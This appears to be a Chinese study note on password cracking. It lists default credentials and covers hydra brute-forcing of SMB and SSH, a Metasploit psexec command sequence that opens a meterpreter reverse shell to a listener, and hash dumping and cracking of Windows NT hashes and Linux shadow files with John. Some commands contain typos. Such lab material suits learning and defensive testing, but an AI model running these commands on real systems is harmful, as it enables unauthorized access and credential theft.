2022-07-04 口令破解

一、口令安全现状

    @        弱口令

    类似于123456、654321、admin123等常见的弱密码。

    @        默认口令

    很多应用或者系统都存在默认口令。比如phpstudy的mysql数据库默认账密【root/root】,Tomcat管理控制台默认密码【tomcat/tomcat】

    @        明文传输

    比如http、ftp、telnet等服务,在网络中传输数据流都为明文,包括口令认证信息等。这样的服务,又被嗅探的风险。

在线破解方式:账密需要认证

            用户名未知

            用户名已知

            使用工具hydra

离线破解方式:密文还原成明文的过程。

二、暴力破解

    暴力破解就是利用所有可能的字符组密码,去尝试破解。下表是根据不同位数生成密码的空间大小。

字符集        密码位数        密码空间

0-9                8位                10^8=100000000

0-9a-z            8位                36^8=2821109907456

三、字典破解

    如果能通过合理的条件筛选或者过滤掉一些全字符组合的内容,就会大幅度降低破解的成本,我们把筛选出的密码组合成特定的字典,再用字典爆破密码也是可以的,但是这样做可能会漏掉真正的密码。密码字典大致分为以下几类。

    @    弱口令字典

    比如123456、admin等这样的默认口令或弱口令

    @    社工字典

    人们在设置密码的时候,为了便与记忆,密码的内容和组合会与个人信息有关,比如常见的密码组合“名字+生日、名字加手机”等

    可以使用cupp工具,但是此工具是国外人开发的。

    crunch工具的使用

四、window远程密码破解

使用hydra工具进行破解

-l        指定一个用户名

-p        指定一个密码

-L        指定一个用户名字典

-P        指定一个密码字典

-vV        显示爆破细节

-o          保存爆破结果

-f        找到正确的密码就停止爆破

-e

        n        null

        s        same

        r        反向

远程爆破windows:hydra -l administrator -P pass.dic smb:// 127.0.0.1

远程爆破linux:hydra -L  -P pass.dic  127.0.0.1 ssh

五、使用msf连接windows

在已知windows账密的情况下,可以使用msf对其进行连接,同时使用对方的命令行。

@    msfconsle

@    use exploit/windows/smb/psexec_psh

@    set payload windows/meterperter/reverse_tcp

@    set RHOSTS 172.16.132.145

@    set SMBUser ajest

@    set LHOST 172.16.132.128

@    exploit

六、John的使用

    @windows hash 值破解

    hashdump

        windows hash 值破解一共需要两步操作。首先我们使用QuarksPwDump工具读取windows账户密码hash值,然后在使用john工具破解。

    john win2k8.hash --format=NT --wordlist=/root/dic/pwd.dic(必须为绝对路径)

    john win2k8.hash --show --format=NT

    @linux口令破解

        linux口令破解,也分远程破解与本地破解。远程破解主要是爆破ssh服务,属于在线密码攻击。本地破解需要拿到linux的shadow文件,进行hash值破解,属于离线密码攻击。

        在线密码攻击:hydra -L /root/dic/user.dic -P /root/dic/pass.dic ssh://127.0.0.1 -vV -o 127.ssh

        离线密码破解:使用john工具对shadow文件进行破解。

john shadow

你可能感兴趣的:(2022-07-04 口令破解)